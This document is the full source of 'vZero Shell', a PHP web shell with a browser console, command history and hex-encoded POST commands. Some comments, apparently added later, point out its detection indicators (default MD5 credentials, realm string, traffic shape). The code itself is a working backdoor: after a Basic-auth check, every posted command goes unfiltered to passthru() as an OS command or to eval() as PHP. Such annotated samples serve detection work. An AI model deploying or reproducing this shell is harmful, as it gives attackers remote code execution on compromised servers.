v Zero Shell - simple web-based CLI
<?php | |
/* | |
________ | |
\___ _/ ___ _ __ ___ | |
.-. ,-, / / / _ \| .-\| / \ | |
\ \/ / _/ /__ | __/| | | | | | |
\__/ /______\\___||_| \___/ | |
______ _ ___ _ _ | |
/ _____\| |___ / _ \| || | | |
\_____ \| ,-. || __/| || | | |
\______/|_| |_|\___/|_||_| | |
vzsh.php (c)oded by Max Dark | |
*/ | |
// Credentials for the HTTP Basic check below. Each value is an unsalted MD5 hex digest that the
// check compares against md5() of the submitted user name / password.
// The digests here are the defaults named in the @var notes. Left unchanged they are fixed strings,
// so they (together with the realm text in $auth_prompt) can be used as static match patterns when
// scanning a webroot for this file.
// don't forget to change before upload to server | |
/** @var string $name default=md5("admin") */ | |
$name = '21232f297a57a5a743894a0e4a801fc3'; | |
/** @var string $pass default=md5("MyVeryLongPassword:)!ChangeMe!") */ | |
$pass = '5bad8c29d2db14e438e1c4e01497ef03'; | |
/** @var string $auth_prompt */ | |
$auth_prompt = 'vZero Shell Authorization'; | |
/**
 * Return the ASCII-art banner as a string.
 *
 * The text is a nowdoc (<<<'TXT'), so nothing inside it is interpolated.
 * executeQuery() echoes this banner when the posted command is empty.
 *
 * @return string
 */
function logo() { | |
$logo = <<<'TXT' | |
________ | |
\___ _/ ___ _ __ ___ | |
.-. ,-, / / / _ \| .-\| / \ | |
\ \/ / _/ /__ | __/| | | | | | |
\__/ /______\\___||_| \___/ | |
______ _ ___ _ _ | |
/ _____\| |___ / _ \| || | | |
\_____ \| ,-. || __/| || | | |
\______/|_| |_|\___/|_||_| | |
vzsh.php (c)oded by Max Dark | |
TXT; | |
return $logo; | |
} | |
// Access gate, run on every request before anything else in the file.
// A request without Basic credentials, or with credentials whose MD5 digests differ from
// $name / $pass, is answered with 401 and the script stops.
// Both failure paths send the same realm header and the same body text; that realm/body pair is
// visible to anything inspecting HTTP responses and can serve as a network-side indicator.
if ( ! isset( $_SERVER['PHP_AUTH_USER'] ) ) { | |
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" ); | |
header( 'HTTP/1.0 401 Unauthorized' ); | |
echo "Bad boy(girl?)"; | |
exit; | |
} else { | |
// Digest comparison of the submitted user name and password against the stored values.
if ( ( md5( $_SERVER['PHP_AUTH_USER'] ) !== $name ) || ( md5( $_SERVER['PHP_AUTH_PW'] ) !== $pass ) ) { | |
header( "WWW-Authenticate: Basic realm=\"$auth_prompt\"" ); | |
header( 'HTTP/1.0 401 Unauthorized' ); | |
echo "Bad boy(girl?)"; | |
exit; | |
} | |
} | |
/** | |
* outShell | |
* | |
*/ | |
function outShell() { | |
?><html> | |
<head><title>vZero Shell</title> | |
<script> | |
// Request object for the command currently in flight; assigned in sendQuery() and read in
// httpObjReady().
var httpObj = null; | |
//var vzDebug=false; | |
// Look up an element of the outer page by id (thin wrapper over document.getElementById).
function getObject(id) { | |
return document.getElementById(id); | |
} | |
// Return the 'vzshContainer' element, reached through the document of the 'ifrm' frame.
// ShowResult() appends command output to it and the '!cls' command empties it.
function getContainer() { | |
return getObject('ifrm').document.getElementById('vzshContainer'); | |
} | |
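/**
 * Append the result of a processed command to the output pane and scroll to it.
 *
 * The text is HTML-encoded before it is written through innerHTML, so markup in the
 * server's response is displayed literally instead of being parsed by the browser.
 *
 * @param {string} text - Raw text to display.
 */
function ShowResult(text) {
    var obj = getContainer();
    if (!obj) {
        return;
    }
    // '&' has to be encoded first; otherwise the entities produced for '<' and '>'
    // would themselves be re-encoded.
    var escaped = text
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;');
    obj.innerHTML = obj.innerHTML + '<pre>' + escaped + '</pre>';
    getObject('ifrm').scrollBy(0, 10000);
}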
// Command history, held in plain page variables.
var vzHistory = [];//command list | |
var vzHistPos = -1;//history position | |
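/**
 * Record a submitted command in the history list.
 *
 * Empty input is ignored. A command that is already stored is not added a second time.
 * In both the "already stored" and "newly stored" cases the history cursor ends up one
 * past the last entry.
 *
 * @param {string} cmd - Command line text as typed.
 */
function historyAdd(cmd) {
    if (cmd === '') {
        return;
    }
    // indexOf compares with strict equality, replacing the hand-written reverse scan.
    if (vzHistory.indexOf(cmd) === -1) {
        vzHistory.push(cmd);
    }
    vzHistPos = vzHistory.length;
}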
/**
 * Print the stored command history, one numbered entry per line, through ShowResult().
 * An empty history is reported with a single "Empty" line.
 */
function showHistory() {
    var report = ["Command history:\n"];
    var count = vzHistory.length;
    if (count < 1) {
        report.push("\tEmpty\n");
    }
    for (var n = 0; n < count; n += 1) {
        report.push(n + ' ' + vzHistory[n] + "\n");
    }
    ShowResult(report.join(''));
}
/**
 * Step one entry back in the history and place it in the command line.
 * When there is no earlier entry the command line is cleared and the cursor is
 * parked at -1.
 */
function historyUp() {
    var input = getCMDLine();
    var previous = vzHistPos - 1;
    if (previous < 0) {
        input.value = '';
        vzHistPos = -1;
        return;
    }
    vzHistPos = previous;
    input.value = vzHistory[previous];
}
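/**
 * Step one entry forward in the history and place it in the command line.
 * Past the newest entry the command line is cleared and the cursor is parked one
 * past the end of the list.
 */
function historyDown() {
    // Use the same accessor as historyUp() rather than repeating the element id.
    var cmdObj = getCMDLine();
    if (vzHistPos + 1 < vzHistory.length) {
        vzHistPos += 1;
        cmdObj.value = vzHistory[vzHistPos];
    } else {
        cmdObj.value = '';
        vzHistPos = vzHistory.length;
    }
}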
// encode query | |
var vzHex = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']; | |
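/**
 * Convert a number to exactly two lowercase hex digits.
 *
 * Only the low byte is represented: values above 0xFF are reduced to their low
 * eight bits, so a UTF-16 code unit outside Latin-1 does not round-trip.
 *
 * @param {number} num - Non-negative integer (a char code in this file).
 * @returns {string} Two hex digits.
 */
function dec2hex(num) {
    // Number#toString(16) replaces the digit lookup table; pad by hand to stay two wide.
    var hex = (num & 0xff).toString(16);
    return hex.length < 2 ? '0' + hex : hex;
}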
// Hex-encode a string: each UTF-16 code unit is passed to dec2hex() and the two-digit results
// are concatenated.
// On the wire this yields a POST body of the form `vzerocmd=<hex digits>` (see sendQuery), so the
// command text does not appear literally in the request; request inspection has to decode the
// hex value to see it.
function encode(str) { // encode the string as hexadecimal (author's note: to get around Magic Quotes)
var res = ''; | |
var len = str.length; | |
for (var i = 0; i < len; i++) { | |
res = res + dec2hex(str.charCodeAt(i)); | |
} | |
return res; | |
} | |
/* | |
function decode(str) { // Декодирование строки из шенацетиричного вида | |
str=str.toLowerCase(); | |
var res=''; | |
len=Math.floor(str.length/2)*2; | |
for(var i=0;i<len;i+=2) { | |
res=res+String.fromCharCode(eval('0x'+str.substr(i,2))); | |
} | |
return res; | |
} | |
*/ | |
// Print the built-in help text through ShowResult().
// The text lists the key bindings and the client-side '!' commands, and states that a command
// starting with '$' is executed on the server as PHP code while everything else is treated as
// an OS command.
function showHelp() { | |
var hlp = "Please write it!!!\n" + | |
"vZero is an Interactive Web Shell with command history\n" + | |
"Keys:\n\tCTRL+Up/Down - history up/down\n" + | |
"\tEnter - send command\n\tEsc - clear cmd line\n" + | |
"Commands start with '$' will be translated into php code and executed on server\n" + | |
"\tExample : $echo(\"\\$_SERVER = \");print_r($_SERVER);\n" + | |
"Supported commands:\n\tAll Server OS commands + \n" + | |
"\t!help - show this info\n\t!history - show command history\n" + | |
"\t!n , where n - number of command in history\n" + | |
"\t!cls - clear screen\n"; | |
ShowResult(hlp); | |
} | |
// Return the command-line input element (id 'vzerocmd').
function getCMDLine() { | |
return getObject('vzerocmd'); | |
} | |
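/**
 * Run a client-side command (the text after a leading '!').
 *
 * 'history', 'help' and 'cls' are handled in the page. A decimal number re-submits
 * the history entry with that index; an index outside the list is ignored. Anything
 * else is reported as an invalid command.
 *
 * @param {string} cmd - Command name or history index, without the '!' prefix.
 */
function execInternalCommand(cmd) {
    if (cmd === 'history') {
        showHistory();
    } else if (cmd === 'help') {
        showHelp();
    } else if (cmd === 'cls') {
        getContainer().innerHTML = '';
    } else if (/^\d+$/.test(cmd)) {
        // Digits only, parsed as base 10: input such as "5abc" or "0x1" is no longer
        // silently read as a history index.
        var idx = parseInt(cmd, 10);
        if (idx < vzHistory.length) {
            getCMDLine().value = vzHistory[idx];
            sendQuery();
        }
    } else {
        ShowResult("Invalid command : !" + cmd + "\n");
    }
}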
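/**
 * Write the initial document of the output frame: the dark console styling plus the
 * 'vzshContainer' element that ShowResult() appends to.
 *
 * @param {Document} idoc - Document object of the output frame.
 */
function writeIframe(idoc) {
    idoc.write(
        "<html><head><style type='text/css'>" +
        "body{background-color :black;color:#d3d3d3;border : none;" +
        "font-family:Courier New,Verdana,monospace;" +
        "font-size:12px;" +
        "scrollbar-face-color:#191919;" +
        "scrollbar-shadow-color:#505050;" +
        "scrollbar-highlight-color:#505050;" +
        "scrollbar-3dlight-color:black;" +
        "scrollbar-darkshadow-color:black;" +
        "scrollbar-track-color:#191919;" +
        "scrollbar-arrow-color:#505050;}" +
        // The container's opening tag had lost its element name; 'pre' matches the
        // closing </pre> that follows the banner text.
        "</style></head><body><pre id=vzshContainer><code>vZero Shell\ntype '!help' for more info</code></pre></body></html>"
    );
    idoc.close();
}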
/**
 * keydown handler for the command line.
 *
 * Enter submits the command, Escape clears the input, and Ctrl+Up / Ctrl+Down walk the
 * history. The key code is taken from the first of which / keyCode / charCode that is a
 * number.
 *
 * @param {Event} event - The keydown event.
 * @returns {boolean} Always true.
 */
function hKeyDown(event) {
    var code = 0;
    if (typeof(event.which) == 'number') {
        code = event.which;
    } else if (typeof(event.keyCode) == 'number') {
        code = event.keyCode;
    } else if (typeof(event.charCode) == 'number') {
        code = event.charCode;
    }

    if (code === 13) {            // Enter
        sendQuery();
    } else if (code === 27) {     // Escape
        clearCmd();
    } else if (code === 38) {     // Up
        if (event.ctrlKey) {
            historyUp();
        }
    } else if (code === 40) {     // Down
        if (event.ctrlKey) {
            historyDown();
        }
    }
    return true;
}
/**
 * Progress/completion handler for the request held in httpObj.
 *
 * readyState 1-3 only update the window status text. readyState 4 prints the response
 * body through ShowResult() and shows the HTTP status in the status text.
 */
function httpObjReady() {
    var state = httpObj.readyState;
    if (state === 1) {
        window.status = 'Connecting to server ...';
    } else if (state === 2) {
        window.status = 'Send command';
    } else if (state === 3) {
        window.status = 'Load result';
    } else if (state === 4) {
        ShowResult(httpObj.responseText);
        window.status = 'Ready. Server status : ' + httpObj.status + ' ' + httpObj.statusText;
    }
    // readyState 0 (and anything else) is deliberately a no-op.
}
/**
 * Empty the command line and give it keyboard focus.
 */
function clearCmd() {
    var input = getCMDLine();
    input.value = '';
    input.focus();
}
/**
 * Submit the current command line.
 *
 * Text starting with '!' is handled in the page by execInternalCommand(). Anything else is
 * stored in the history and sent to the server. The input is cleared and refocused either way.
 *
 * Traffic shape, for request inspection: an asynchronous POST to the script's own URL with
 * Content-Type application/x-www-form-urlencoded and a body of `vzerocmd=` followed by the
 * hex-encoded command.
 *
 * @returns {boolean} Always true.
 */
function sendQuery() {
    var cmdObj = getCMDLine();
    var line = cmdObj.value;

    if (line.charAt(0) === '!') {
        execInternalCommand(line.substring(1, line.length));
    } else {
        historyAdd(line);

        // Pick the transport: native XMLHttpRequest, else the legacy ActiveX object, else none.
        httpObj = null;
        if (window.XMLHttpRequest) {
            httpObj = new XMLHttpRequest();
            httpObj.onload = httpObjReady;
        } else if (window.ActiveXObject) {
            httpObj = new ActiveXObject("Microsoft.XMLHTTP");
            httpObj.onreadystatechange = httpObjReady;
        }

        if (httpObj) {
            // NOTE(review): PHP_SELF is echoed into this quoted script string without any
            // escaping. PHP_SELF reflects the path the page was requested with, so the emitted
            // script text varies with the request URL.
            httpObj.open("POST", '<?php echo $_SERVER['PHP_SELF'];?>', true);
            httpObj.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
            httpObj.send('vzerocmd=' + encode(line));
        }
    }

    cmdObj.value = '';
    cmdObj.focus();
    return true;
}
</script> | |
<style type='text/css'> | |
body, iframe, input { | |
background-color: black; | |
color: #d3d3d3; | |
border: none; | |
font-family: Courier New, Verdana, monospace; | |
font-size: 12px; | |
scrollbar-face-color: #191919; | |
scrollbar-shadow-color: #505050; | |
scrollbar-highlight-color: #505050; | |
scrollbar-3dlight-color: black; | |
scrollbar-darkshadow-color: black; | |
scrollbar-track-color: #191919; | |
scrollbar-arrow-color: #505050; | |
} | |
input.shell_control { | |
background-color: #191919; | |
border: solid 1px #505050; | |
color: #505050 | |
} | |
input.shell_text { | |
background-color: #191919; | |
border: solid 1px #303030; | |
color: #d3d3d3 | |
} | |
</style> | |
</head> | |
<body> | |
<iframe id=ifrm name=ifrm width=96% height=90% src='' style="border: 0"></iframe> | |
<br/> | |
<nobr> | |
><input placeholder="enter command" id=vzerocmd class=shell_text size=120 onkeydown='hKeyDown(event);'> | |
<input type=button class=shell_control value=send onclick='sendQuery();'> | |
<input type=button class=shell_control value=clear onclick='clearCmd();'> | |
</nobr> | |
<script>writeIframe(getObject('ifrm').document); | |
getObject('vzerocmd').focus();</script> | |
</body> | |
</html><?php | |
} | |
/* | |
function hex_encode($str) { | |
$len=strlen($str); | |
$i=0; | |
$res=''; | |
for($i=0;$i<$len;$i++) { | |
$c=ord($str[$i]); | |
if($c!=0x0) { | |
if($c<0x10) | |
$res.='0'; | |
$res.=dechex($c); | |
} else { | |
$res.='00'; | |
} | |
} | |
return $res; | |
}*/ | |
/**
 * Decode a string of hex digit pairs back into raw bytes (the inverse of the page's
 * JavaScript encode()).
 *
 * The length is rounded down to an even number, so a trailing unpaired character is ignored.
 *
 * @param string $str hex text
 * @return string decoded bytes
 */
function hex_decode( $str ) { | |
$len = floor( strlen( $str ) / 2 ) * 2; | |
$res = ''; | |
for ( $i = 0; $i < $len; $i += 2 ) { | |
// Two hex characters -> one byte.
$res .= chr( hexdec( ( $str[ $i ] ) . ( $str[ $i + 1 ] ) ) ); | |
} | |
return $res; | |
} | |
/**
 * Handle one posted command and echo the result into the response.
 *
 * An empty value prints the banner. Otherwise the value is hex-decoded, echoed back prefixed
 * with the current working directory, and executed: text starting with '$' has that character
 * stripped and is passed to eval() as PHP source; anything else is passed to passthru() as an
 * OS command.
 *
 * Review/triage notes: the value comes from $_POST (see the dispatch at the end of the file) and
 * reaches eval()/passthru() with no filtering, so any client that passes the Basic-auth gate
 * runs arbitrary code with whatever privileges the PHP process has. The chain
 * request field -> hex decode -> eval()/passthru() is the trait that classifies this file as a
 * web shell. Nothing in this function writes a log entry.
 *
 * @param string $cmd hex-encoded command text
 */
function executeQuery( $cmd ) { | |
if ( empty( $cmd ) ) { | |
echo logo(); | |
} else { | |
$cmd = hex_decode( $cmd ); | |
// Echo of "<cwd>><command>" ahead of the output; this line appears in every response body.
echo getcwd() . ">$cmd\n"; | |
if ( $cmd[0] == '$' ) { | |
$cmd = substr( $cmd, 1, strlen( $cmd ) - 1 ); | |
echo "Eval $cmd :\n"; | |
// Arbitrary PHP supplied by the client is evaluated here.
echo eval( $cmd ); | |
} else { | |
// Arbitrary OS command supplied by the client; its output is streamed to the response.
passthru( $cmd ); | |
} | |
} | |
} | |
// Request routing (reached only after the Basic-auth gate at the top of the file):
// a POST carrying the 'vzerocmd' field is treated as a command and answered with its output;
// any other request is answered with the HTML/JavaScript console page.
if ( isset( $_POST['vzerocmd'] ) ) { | |
executeQuery( $_POST['vzerocmd'] ); | |
} else { | |
outShell(); | |
} | |
?> |